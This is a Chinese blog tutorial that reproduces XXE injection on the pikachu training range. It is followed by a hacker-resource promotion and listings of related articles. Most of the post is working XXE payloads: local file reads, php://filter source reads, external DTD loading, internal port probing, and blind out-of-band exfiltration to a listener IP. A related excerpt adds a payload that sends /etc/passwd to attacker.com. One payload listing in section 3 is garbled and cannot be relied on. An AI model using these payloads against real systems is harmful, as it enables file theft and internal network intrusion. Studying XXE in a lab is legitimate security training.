XXE漏洞复现,零基础入门到精通,收藏这篇就够了

最新推荐文章于 2025-11-30 16:19:21 发布
原创 最新推荐文章于 2025-11-30 16:19:21 发布 · 181 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android #前端 #网络 

  XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)内网扫描等危害

在本篇 文章中我们使用pikachu靶场实现XXE漏洞复现

1.POC:攻击测试

  在这里,我们先尝试用xml语言定义一个实体,并将其内容定义为“仙男”,然后进行调用,具体的代码如下

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "仙男" > ]>
<foo>&xxe;</foo>

  输入后点击提交,发现我们定义的实体内容直接显示在页面上

2.EXP:查看文件

  xml漏洞还可以让攻击者直接查看网站所有者计算机中的文件,在这里我们利用file协议去读取一下位于C盘下的1.txt文件内容,具体代码如下

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///c:/1.txt" > ]><foo>&xxe;</foo>

输入后点击提交出现如下页面

3.EXP:查看源码

  这一次,我们要查看pikachu靶场下一个文件的源代码,但若是以file和http协议读取.php文件则会报错,因为php文件中含有<>//等特殊字符,xml解析时会当成xml语法进行解析,所以在这里我们可以使用php://filter/read=convert.base64-encode/resource=,将我们获取到的信息先进行base64编码,再将其输出,具体代码如下,(为了举例子,在这里我们仍然查看c盘下的1.txt)

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://192.168.136.133:8844/?%file;'>">
%start;
<?xml version="1.0"?>"php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">  %remote;
%send;]>

  输入后出现如下页面


  将其base64解码后即可获得1.txt内容

4.EXP:DTD外部调用

  xml漏洞还可以利用dtd文件,从外部调用并查看文件,首先将想要查看的文件写到dtd文件中并保存到web根目录下,与pikachu靶场同级


  然后在输入框中输入如下代码,去定义一个参数实体,内容指向我们web目录下的ooo.dtd文件,然后在最后进行调用

<!DOCTYPE foo
[<!ELEMENT foo ANY>
<!ENTITY % xxe SYSTEM "http://127.0.0.1/ooo.dtd" >
%xxe;
]>
<foo>&evil;</foo>

  点击提交后出现如下页面

5.EXP:探测内网存活主机与开放端口

  利用xml漏洞,我们还可以查看内网中存活的主机以及其开放的端口,具体代码如下

<?xml version="1.0" encoding="UTF-8"?>  <!DOCTYPE foo [ <!ELEMENT foo ANY>
<!ENTITY rabbit SYSTEM "http://127.0.0.1:80"> ]>
<x>&rabbit;</x>

  这里是查看我们的80端口是否开放,如果开放则会立马加载完成页面,如果没开放则会加载一段时间后才恢复正常

6.EXP:无回显探测

  上面的文件查看等操作都是在页面有回显的前提下进行的,在这里我们进行一下无回显探测,我们需要用到kali虚拟机。先确保物理机与虚拟机可以连接,然后在kali中开启任意一个端口的监听,这里,我们开启8844端口监听


  然后在我们的web根目录下创建一个dtd文件,用于外部调用,ooo.dtd文件的内容如下

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://192.168.136.133:8844/?%file;'>">
%start;

  这里的url填写虚拟机的ip以及我们监听的端口,然后在c盘下创建一个1.txt文件,我这里的内容为1231![](https://i-blog.csdnimg.cn/direct/4806c5cc59e24596a799d14a207e46ef.png)

  然后构造我们要在输入框中提交的代码,具体代码如下

<?xml version="1.0"?>
<!DOCTYPE message [    
<!ENTITY % remote SYSTEM "http://192.168.136.133/ooo.dtd">      
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt">    %remote;    
%send;]>

  提交后当页面开始加载时,就可以去看虚拟机监听结果了


  ![](https://i-blog.csdnimg.cn/direct/00cb92637d744c92859c26b592621ae4.png)

  问号后面的内容就是1.txt中的内容经过base64编码后的内容

黑客/网络安全学习包

资料目录

  1. 成长路线图&学习规划

  2. 配套视频教程

  3. SRC&黑客文籍

  4. 护网行动资料

  5. 黑客必读书单

  6. 面试题合集

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要先学习成长路线图方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

2.视频教程

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩


因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.SRC&黑客文籍

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:

黑客资料由于是敏感资源,这里不能直接展示哦!

4.护网行动资料

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!

5.黑客必读书单

**

**

6.面试题合集

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。

更多内容为防止和谐,可以扫描获取~

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

常见逻辑漏洞复现合集,从零基础精通收藏了!
A1_3_9_7的博客
07-07 989
验证码(CAPTCHA)是一种用于区分人类用户和机器人的测试,通常以图像、音频或文字形式呈现给用户,要求用户根据提示进行识别或操作。验证码的目的是防止自动化程序(如恶意机器人)对系统进行恶意攻击或滥用。验证码复用指的是在验证码在生成和被使用后,网站后端没有及时主动销毁或更新该验证码,导致该验证码可以被重复使用。恶意用户可以将重复利用同一验证码,绕过验证码的验证机制,直接访问后续业务。验证码复用漏洞是一种安全漏洞,通常出现在需要验证码验证的系统中。
2025最新版漏洞挖掘教程,零基础入门精通收藏
A1_3_9_7的博客
02-13 880
经常有小伙伴问霸哥我。为什么自己总是挖不到漏洞呢?渗透到底是什么样的流程呢?全文章内容较长,请耐心观看!
新手如何挖掘第一个漏洞零基础入门精通收藏
hackeroink的博客
11-04 987
通过以上步骤,我们成功地从信息收集、端口扫描、漏洞识别到最终的漏洞利用,完成了一个完整的漏洞挖掘过程。对于新手来说,关键在于理解每个步骤的目的和方法,并在实践中不断提升自己的技能。
漏洞需要什么技术?挖漏洞零基础入门精通收藏
2301_79455190的博客
07-05 626
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
2024最新版漏洞挖掘教程,零基础入门精通收藏
wholeliubei的博客
10-29 1049
经常有小伙伴问大白我。为什么自己总是挖不到漏洞呢?渗透到底是什么样的流程呢?全文章内容较长,请耐心观看!
运维工程师必备技能清单,零基础入门精通收藏
weixin_57514792的博客
10-07 868
运维工程师必备技能清单,零基础入门精通收藏
新手如何挖掘第一个漏洞零基础入门精通收藏这一
A1_3_9_7的博客
01-22 1022
挖掘漏洞是信息安全领域的核心技能之一,对于新手来说,理解如何发现和利用漏洞是一个至关重要的学习过程。本文将通过一个具体的案例,带你一步步学习如何挖掘并利用漏洞。我们将以 Apache ActiveMQ 的漏洞为例,详细解析从发现到利用的全过程。通过以上步骤,我们成功地从信息收集、端口扫描、漏洞识别到最终的漏洞利用,完成了一个完整的漏洞挖掘过程。对于新手来说,关键在于理解每个步骤的目的和方法,并在实践中不断提升自己的技能。
SRC漏洞挖掘经验+技巧零基础入门精通收藏
Python_paipai的博客
09-06 2740
在HP Data protecetor Media Operations 的客户端连接服务端时,通过私访有的通信协议,客户端会首先检查[系统分区]:\Documents and Settings\[用户名]\Application Data 下面是否有相应的资源(如插件等),如果没有,则会向服务器请求需要的文件,服务器没有验证请求的文件名的合法性,而且这个过程不需要任何验证,攻击者精心构造文件名,可以读取服务端安装目录所在分区的任意文件。最古老的内存破坏类型。漏洞造成的敏感信息泄露导致机密性的破坏;
保姆级别的挖漏洞教程,零基础入门精通收藏这一
A1_3_9_7的博客
03-07 1000
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…制胜点就在这里了,比如你交了一个中危的漏洞是3分,但是你报告写的好,是优秀,积分翻倍变6分,相当于交了两个中危漏洞。我看很多人,漏洞正文只有文字 没有图片,很简陋,我们最好加上图片,审核员看的舒服一点,心情好点,对我们有好处。我在上面的“提交报告”中,教大家提交的报告,漏洞标题、基本信息、漏洞正文,这3个都算好,不用管。
网络安全之XXE漏洞复现及防御(上)(技术进阶)
weixin_70911257的博客
04-16 1923
xxe漏洞复现
漏洞复现】用友U8 Cloud XChangeServlet XXE漏洞复现
m0_71944965的博客
12-30 404
用友U8 cloud /servicelXChangeServlet接口存在XXE漏洞,未授权的攻击者可通过此漏洞获取数据库敏感信息,从而盗取服务器数据造成服务器信息泄露。
网络工程师软考笔记(非常详细)零基础入门精通收藏
weixin_57514792的博客
08-22 1771
网络工程师软考笔记(非常详细)零基础入门精通收藏
中间人攻击(非常详细)零基础入门精通收藏
weixin_57514792的博客
08-08 760
中间人攻击(非常详细)零基础入门精通收藏
MySQL——表操作及查询
2509_94186105的博客
11-30 705
MySQL的操作中,一些专用的词无论是大写还是小写都是可以通过的。"[]"表示可有可无,插入时,如果不指定要插入的列,则表示默认全部列都要插入数据,插入数据的顺序必须和列的顺序一致。如果插入单行数据,则只需一个"()“,如果想要多行插入,则可以同时追加多个”()"。此外,由于主键或者唯一键对应的值已经存在而导致插入失败,则可以更新数据:除这条语句之外,还有一条语句,名为替换,也可以解决主键或唯一键冲突问题:如果没有发生冲突,就相当于直接插入,如果发生冲突,则删除原有数据,重新插入新数据。全列查询指定列查询查
PHP女程序猿学习Java的Day-5
最新发布
汪原野
11-30 223
注意月份的表示,一月是0,二月是1,以此类推,12月是11。因为大多数人习惯于使用单词而不是使用数字来表示月份,这样程序也许更易读,父类Calendar使用常量来表示月份:JANUARY、FEBRUARY等等。Calendar 类是一个抽象类,为我们提供了关于日期计算的功能,比如:年、月、日、时、分、秒的展示和计算。它的对象表示一个特定的瞬间,精确到毫秒。分配一个Date对象,并初始化此对象为系统当前的日期和时间,可以精确到毫秒)。分配 Date 对象并初始化此对象,以表示自从标准基准时间以来的毫秒数。
[CTF]PHP反序列化总结
网络安全
11-30 765
序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。在网上找到一个比较形象的例子比如:现在我们都会在淘宝上买桌子,桌子这种很不规则的东西,该怎么从一个城市运输到另一个城市,这时候一般都会把它拆掉成板子,再装到箱子里面,就可以快递寄出去了,这个过程就类似我们的序列化的过程(把数据转化为可以存储或者传输的形式)。当买家收到货后,就需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。php 将数据序列化和反序列化会用到两个函数serialize。
安卓15_ROM修改定制化_____常用修改ROM 解打包ROM工具的使用 电脑端工具图文详解【三】
小马哥的专栏
11-29 139
💝工欲善其事 必先利其器。在修改rom定制化过程中。一款好用的工具可以让你的修改工作更加高效、精准,减少不必要的错误和重复劳动。专业工具能自动化处理繁琐的步骤,例如反编译、资源替换、签名验证等,避免手动操作带来的疏漏,节省大量时间。优秀的工具与详细的图文教程,即使是对ROM修改不太熟悉的用户,也能通过工具快速上手,减少学习成本。在前面的博文中详细介绍了手机端与电脑端rom工具的操作步骤。今天在解析另外一款工具。 通过博文了解💝💝💝 1-------💝💝💝电脑端rom工具的常规解打包操作使用
MySQL 机器重启后,gtid_executed 是如何初始化的
翔云
11-27 576
MySQL启动时通过两个步骤初始化gtid_executed:首先从mysql.gtid_executed表加载持久化存储的GTID集合,然后扫描所有binlog文件验证并补充未持久化的GTID。最终gtid_executed是两者的并集,确保事务记录的完整性。基于此,gtid_purged通过集合差运算得出,表示已清除binlog中的事务。这种设计兼顾效率与数据安全性,快速加载表数据的同时通过binlog扫描保证准确性。
xxe漏洞复现
07-30
### XXE(XML External Entity)漏洞复现步骤及利用示例 XXE(XML External Entity)漏洞通常出现在应用程序解析 XML 输入时,未正确处理外部实体引用,从而导致潜在的敏感数据泄露、服务器端请求伪造(SSRF)等攻击。以下是复现 XXE 漏洞的典型步骤及利用示例。 #### 1. 漏洞复现环境搭建 为了复现 XXE 漏洞,需准备一个能解析 XML 并支持外部实体的解析器。例如,使用 Python 的 `xml.etree.ElementTree` 或 Java 的 `DocumentBuilderFactory` 等库。搭建一个简单的 Web 应用,接收 XML 输入并解析。 #### 2. 基础 XXE 利用示例 最基本的 XXE 攻击是通过定义外部实体读取本地文件。例如: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root> ``` 当服务端解析该 XML 时,会读取 `/etc/passwd` 文件内容,并可能将其返回给攻击者[^4]。 #### 3. 带外数据(OOB)利用方式 在某些情况下,服务器不会直接返回解析结果,此时可以通过带外数据(Out-of-Band)方式将数据发送到攻击者控制的服务器。例如: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % remote SYSTEM "http://attacker.com/xxe?data=%file;"> %remote; ]> <root/> ``` 该 payload 会尝试读取 `/etc/passwd` 文件,并将其作为参数发送到攻击者控制的 `http://attacker.com/xxe`,从而实现数据窃取[^4]。 #### 4. XXE 目录遍历攻击 通过 XXE 漏洞,还可以尝试列出服务器上的目录内容。虽然实际中受限于文件系统权限,但理论上可以构造如下 payload: ```xml <!DOCTYPE test [ <!ENTITY % file SYSTEM "file:///etc/"> <!ENTITY % eval "<!ENTITY % directory SYSTEM 'file:///%file;'>"> %eval; %directory; ]> <test>&directory;</test> ``` 此 payload 会尝试读取 `/etc/` 目录内容,并通过外部实体将其内容外带[^1]。 #### 5. XXE 与 SSRF 结合攻击 XXE 还可用于 SSRF(Server Side Request Forgery)攻击,访问内网资源或远程服务器。例如: ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/internal-api"> ]> <root>&xxe;</root> ``` 此 payload 会向本地 `8080` 端口发起请求,获取内网服务的响应内容[^4]。 #### 6. XXE 修复建议 为了防止 XXE 漏洞,建议采取以下措施: - **禁用外部实体解析**:在 XML 解析器中禁用 DTD(Document Type Definitions)和外部实体。 - **使用安全的解析库**:避免使用易受攻击的 XML 解析器,改用 JSON 等更安全的数据格式。 - **输入验证与过滤**:对用户输入进行严格验证,拒绝包含 XML 特殊字符的输入。 - **最小权限原则**:确保运行 XML 解析器的进程使用最小权限账户,防止攻击者读取敏感文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值